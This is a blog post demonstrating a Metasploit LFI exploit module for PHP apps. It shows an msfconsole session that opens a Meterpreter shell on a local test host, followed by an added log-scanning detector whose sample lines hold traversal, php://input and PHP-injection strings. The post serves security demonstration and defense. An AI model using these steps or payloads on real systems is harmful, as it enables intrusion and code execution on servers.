Metasploit PHP LFI exploit module
Last week I wrote a simple exploit module for Metasploit to attack PHP applications with LFI vulnerabilities.
It uses php://input to inject the code, or the webserver logs otherwise.
If I had time, I would like to implement some tricks, like injecting PHP code into the SSH logs or the e-mail server logs, but that is not possible for now.
Note: It is really buggy and the injection may not be successful, depending on the length of the payload. Please remember that PHP limits the size of the POST message, so a long payload may be truncated. The same problem applies to the log file injection.
msf exploit(handler) > use exploit/unix/webapp/php_lfi
msf exploit(php_lfi) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_lfi) > set RPORT 8181
RPORT => 8181
msf exploit(php_lfi) > set URI /index.php?foo=xxLFIxx
URI => /index.php?foo=xxLFIxx
msf exploit(php_lfi) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_lfi) > exploit -z
[*] Started bind handler
[*] Trying generic exploits
[*] Clean LFI injection
[*] Sending stage (31612 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:19412 -> 127.0.0.1:4444) at Tue May 24 14:47:29 +0200 2011
C[-] Exploit exception: Interrupt
[*] Session 10 created in the background.
msf exploit(php_lfi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: /usr/home/test/cherokee/www
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 0 fil Tue May 10 11:09:39 +0200 2011 foo.php
40755/rwxr-xr-x 512 dir Tue May 10 10:53:59 +0200 2011 images
100644/rw-r--r-- 1795 fil Tue May 10 10:19:23 +0200 2011 index.html
100644/rw-r--r-- 37 fil Tue May 10 13:52:25 +0200 2011 index.php
meterpreter > sysinfo
OS : FreeBSD redphantom.skynet.ct 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Computer : redphantom.skynet.ct
Meterpreter : php/php
meterpreter > exit
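The two injection vectors the post describes (php://input and the webserver log file) both leave traces in the server's own access log, which is where a defender would look for them. The following script is an added example and is not part of the original post or of the Metasploit module: it parses access-log lines in the common "combined" format and flags three indicators, a path-traversal sequence in the request, a php:// wrapper in the request, and PHP code written into any logged field (the sign of log-file injection). All log lines are constructed for the demonstration; the parameter name foo mirrors the URI used in the post, and the regular expression and rule names are this example's own.

```python
"""Flag access-log lines that carry LFI indicators.

Added example, not code from the original post or from the Metasploit
module. The log lines at the bottom are constructed ("combined" format);
the parameter name `foo` mirrors the URI used in the post.
"""

import re
from urllib.parse import unquote

# Combined log format:
#   host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)


def decode(text: str) -> str:
    """Percent-decode twice so a double-encoded traversal (%252e%252e%252f)
    does not slip past the string rules, then lower-case for matching."""
    return unquote(unquote(text)).lower()


def classify(line: str) -> list[str]:
    """Return the names of every indicator found in one access-log line."""
    match = LOG_RE.match(line)
    if not match:
        return ["unparseable"]
    request = decode(match.group("request"))
    # Injected PHP code can land in any logged field (URI, referer, agent),
    # so that rule is checked against the whole decoded line.
    whole = decode(line)
    hits = []
    if "../" in request or "..\\" in request:
        hits.append("path_traversal")
    if "php://" in request:
        hits.append("php_wrapper")
    if "<?php" in whole or "<?=" in whole:
        hits.append("php_code_in_log")
    return hits


def scan(lines):
    """Return (line_number, indicators) for each line that triggers a rule."""
    findings = []
    for number, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            findings.append((number, found))
    return findings


# Constructed sample log: one benign request, then one line per indicator,
# plus a double-encoded traversal to show why decode() runs twice.
CONSTRUCTED_LOG = [
    '10.0.0.5 - - [24/May/2011:14:47:29 +0200] "GET /index.php?foo=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/May/2011:14:47:30 +0200] "GET /index.php?foo=../../../../etc/passwd HTTP/1.1" 200 1795 "-" "curl/7.21"',
    '10.0.0.9 - - [24/May/2011:14:47:31 +0200] "POST /index.php?foo=php://input HTTP/1.1" 200 37 "-" "curl/7.21"',
    '10.0.0.9 - - [24/May/2011:14:47:32 +0200] "GET /index.php?foo=about HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '10.0.0.9 - - [24/May/2011:14:47:33 +0200] "GET /index.php?foo=%252e%252e%252fetc/passwd HTTP/1.1" 200 37 "-" "curl/7.21"',
]


if __name__ == "__main__":
    for number, found in scan(CONSTRUCTED_LOG):
        print(f"line {number}: {', '.join(found)}")
```

The php_code_in_log rule is the one worth keeping even after the application itself is fixed: a PHP tag inside a logged User-Agent or referer is never legitimate traffic, and finding it tells you someone tried to seed the log for a later include. Double decoding is deliberate, since a single unquote() would leave %252e%252e%252f looking harmless.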
Source : http://www.shellguardians.com/2011/05/metasploit-php-lfi-exploit-module.html